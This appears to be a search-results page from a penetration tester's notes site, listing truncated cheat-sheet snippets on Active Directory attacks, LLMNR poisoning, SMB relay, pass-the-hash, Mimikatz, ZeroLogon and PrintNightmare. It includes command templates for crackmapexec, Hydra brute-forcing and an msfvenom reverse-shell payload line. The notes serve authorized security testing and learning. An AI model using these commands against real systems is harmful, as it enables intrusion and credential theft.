100 total results found
Notes & Cheat Sheets
File Transfers and Data Exfiltration
Post Exploitation: Enumeration
Post Exploitation: Attacks
Automation with Ansible
FleetDM On Debian 11
Initial Attack Vectors
Internal: --------- Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: --------- Attack vectors that could work in both internal and external ...
A place to keep cheat sheets and configuration guides related to Wazuh that are otherwise too short for a blog post.
LLMNR Poisoning (Internal)
Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local Area Network (LAN), this attack method cannot be performed from a different subnet. The attacker would have to compromise a host on the LAN and upload tools, or p...
SMB Relay (Internal/External)
Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...
IPv6 DNS Spoofing (Internal)
Note: Network Environment This spoofing attack and works by sending a router announcement to multicastff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announc...
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...
Overview A set of PowerShell functions that can be used to enumerate ActiveDirectory. Part of the larger PowerSploit Framework Usage Transfer PowerView.ps1 to the compromised target. Requires a PowerShell session. Then, source the file into the current se...
1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navigate to http://localhost:7474 Login is neo4j and change the default password sudo bloodhound & Log into the neo4j user account with the new password 3. Da...
Users net.exe Local net user net user <username> Domain net user /domain net user <username> /domain PowerShell Local Get-LocalUser Domain # Can enumerate specific users by changing the search filter $dom = [System.DirectoryServices.Active...
Pass the Password
Overview Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Attack 1: crackmapexec sudo crackmapexec smb <target-or...
Pass the Hash
Overview Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Anatomy of a Windows Hash username:SID:LM_HASH:NT...
Overview Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain unt...
Overview The attacker uses a known username and password of a user on a domain. A typical Kerberos workflow is: Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket). Then, they'll use that TGT to request a TGS (ticket-gra...
Group Policy Preferences (GPP)
Overview GPP allows admins to create policies with embedded credentials. The credentials are encrypted and stored in a cPassword. The key was accidentally released. What's the Flaw? The MS14-025 patch does not apply to GPP passwords embedded prior to the ...
Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-ip...
Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimkatz is primarily used to dump hashes from LSASS, pass hashes, or generating Kerberos tickets for use in attacks. ...
Caution This can potentially break a domain controller, due the fact that this attack temporarily removes the password from a domain controller. After testing this attack, the original password should be restored. ZeroLogon Checker https://github.com/Secu...
AES 256 ECB
Example from Vulnhub https://www.vulnhub.com/entry/prime-1,358/ In this challenge, a script outputs an AES-256 encrypted file and a hint in key.txt The hint says to hash the word "ippsec" with the MD5 algorithm This is the key to decrypt the hash Hash Base 6...
Use FFUF to Brute Force Login
Brute Force with a Request File Start Burp Make a randomized login to the target web page Copy the output, for example: POST /login HTTP/1.1 Host: 10.10.10.10 Content-Length: 37 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT ...
Brute Forcing Logins with Hydra
Example Usage hydra -IVVf [ip-or-hostname] -t [threads] -l [username] -P [password-list] [http-<method>-form] [path-to-login-page:<username-param>=^USER^&<password-param>=^PASS^&<additional-form-param>=[param-value]:<login-error-message>:<session-id> I like ...
Nmap Scanning with Categories
Example 1: Nmap script scan with categories Categories https://nmap.org/book/nse-usage.html#nse-categories auth broadcast brute default discovery dos exploit external fuzzer intrusive malware safe version vuln # Scan UDP/161 with all snmp-* scripts # Do ...